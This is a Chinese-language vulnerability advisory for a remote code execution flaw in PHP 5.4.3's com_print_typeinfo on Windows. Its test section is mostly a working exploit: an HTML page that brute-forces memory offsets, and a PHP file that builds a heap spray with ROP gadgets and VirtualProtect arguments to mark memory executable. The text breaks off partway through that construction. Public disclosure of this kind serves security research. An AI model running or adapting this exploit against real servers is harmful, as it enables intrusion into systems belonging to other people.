typeinfo()'远程代码执行漏洞

发布日期：2012-05-11
更新日期：2012-05-23

受影响系统：
PHP PHP 5.4.3
描述：
--------------------------------------------------------------------------------
BUGTRAQ  ID: 53621

PHP是一种HTML内嵌式的语言，PHP与微软的ASP颇有几分相似，都是一种在服务器端执行的嵌入HTML文档的脚本语言，语言的风格有类似于C语言，现在被很多的网站编程人员广泛的运用。

PHP 5.4.3中的函数com_print_typeinfo在实现时存在远程漏洞，php引擎在执行包含可绑定壳到端口的壳代码的恶意代码时，可被远程攻击者利用在受影响的网络服务器中执行任意代码。

<*来源：0in （0in.email@gmail.com）
        condis
 
  链接：?storyid=13255
*>

测试方法：
--------------------------------------------------------------------------------

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

0in （0in.email@gmail.com）提供了如下测试方法：

// Exploit Title: PHP 5.4 (5.4.3) Code Execution 0day (Win32)
// Exploit author: 0in (Maksymilian Motyl)
// Email: 0in(dot)email(at)gmail.com
// * Bug with Variant type parsing originally discovered by Condis
// Tested on Windows XP SP3 fully patched (Polish)

===================
offset-brute.html
===================

<html><body>
<title>0day</title>
<center>
<font size=7>PHP 5.4.3 0day by 0in & cOndis</font><br>
<textarea rows=50 cols=50>&lt;/textarea&gt;
</center>
<script>
function sleep(milliseconds) {
  var start = new Date().getTime();
  for (var i = 0; i < 1e7; i++) {
    if ((new Date().getTime() - start) > milliseconds){
      break;
    }
  }
}
function makeRequest(url, parameters)
{
    var xmlhttp = new XMLHttpRequest();
    if (window.XMLHttpRequest) {
        xmlhttp = new XMLHttpRequest();
        if (xmlhttp.overrideMimeType) {
            xmlhttp.overrideMimeType('text/xml');
        }
    } else if (window.ActiveXObject) {
        // IE
        try { xmlhttp = new ActiveXObject("Msxml2.XMLHTTP"); }
        catch (e) {
            try { xmlhttp = new ActiveXObject("Microsoft.XMLHTTP"); }
            catch (e) {}
        }
    }

if (!xmlhttp) {
        alert('Giving up :( Cannot create an XMLHTTP instance');
        return false;
    }

xmlhttp.open("GET",url,true);
    xmlhttp.send(null);
    return true;
}
test=document.getElementById("log");
for(offset=0;offset<300;offset++)
{
    log.value+="Trying offset:"+offset+"\r\n";
    makeRequest("0day.php?offset="+offset);
    sleep(500);
}

</script></body></html>

===================
     0day.php
===================

<?php

$spray = str_repeat("\x90",0x200);
$offset=$_GET['offset'];
// 775DF0Da   # ADD ESP,10 # RETN    ** [ole32.dll]
$spray = substr_replace($spray, "\xda\xf0\x5d\x77", (strlen($spray))*-1,(strlen($spray))*-1);
// :> 0x048d0030
$spray = substr_replace($spray, pack("L",0x048d0030+$offset), (strlen($spray)-0x8)*-1,(strlen($spray))*-1);

//0x7752ae9f (RVA : 0x0005ae7f) : # XCHG EAX,ESP # MOV ECX,468B0000 # OR AL,3 # RETN   [ole32.dll]
$spray = substr_replace($spray, "\x9f\xae\x52\x77", (strlen($spray)-0x10)*-1,(strlen($spray))*-1);

// Adress of VirtualProtect 0x7c801ad4
$spray = substr_replace($spray, "\xd4\x1a\x80\x7c", (strlen($spray)-0x14)*-1,(strlen($spray))*-1);

//  LPVOID lpAddress  = 0x048d0060
$spray = substr_replace($spray, pack("L",0x048d0060+$offset), (strlen($spray)-0x1c)*-1,(strlen($spray))*-1);

// SIZE_T dwSize  = 0x01000000
$spray = substr_replace($spray, "\x00\x00\x10\x00", (strlen($spray)-0x20)*-1,(strlen($spray))*-1);

// DWORD flNewProtect =  PAGE_EXECUTE_READWRITE (0x00000040) | 0xffffffc0
$spray = substr_replace($spray, "\x40\x00\x00\x00", (strlen($spray)-0x24)*-1,(strlen($spray))*-1);
// __out  PDWORD lpflOldProtect = 0x04300070 | 0x105240000

// 0x048d0068
$spray = substr_replace($spray, pack("L",0x048d0068+$offset), (strlen($spray)-0x28)*-1,(strlen($spray))*-1);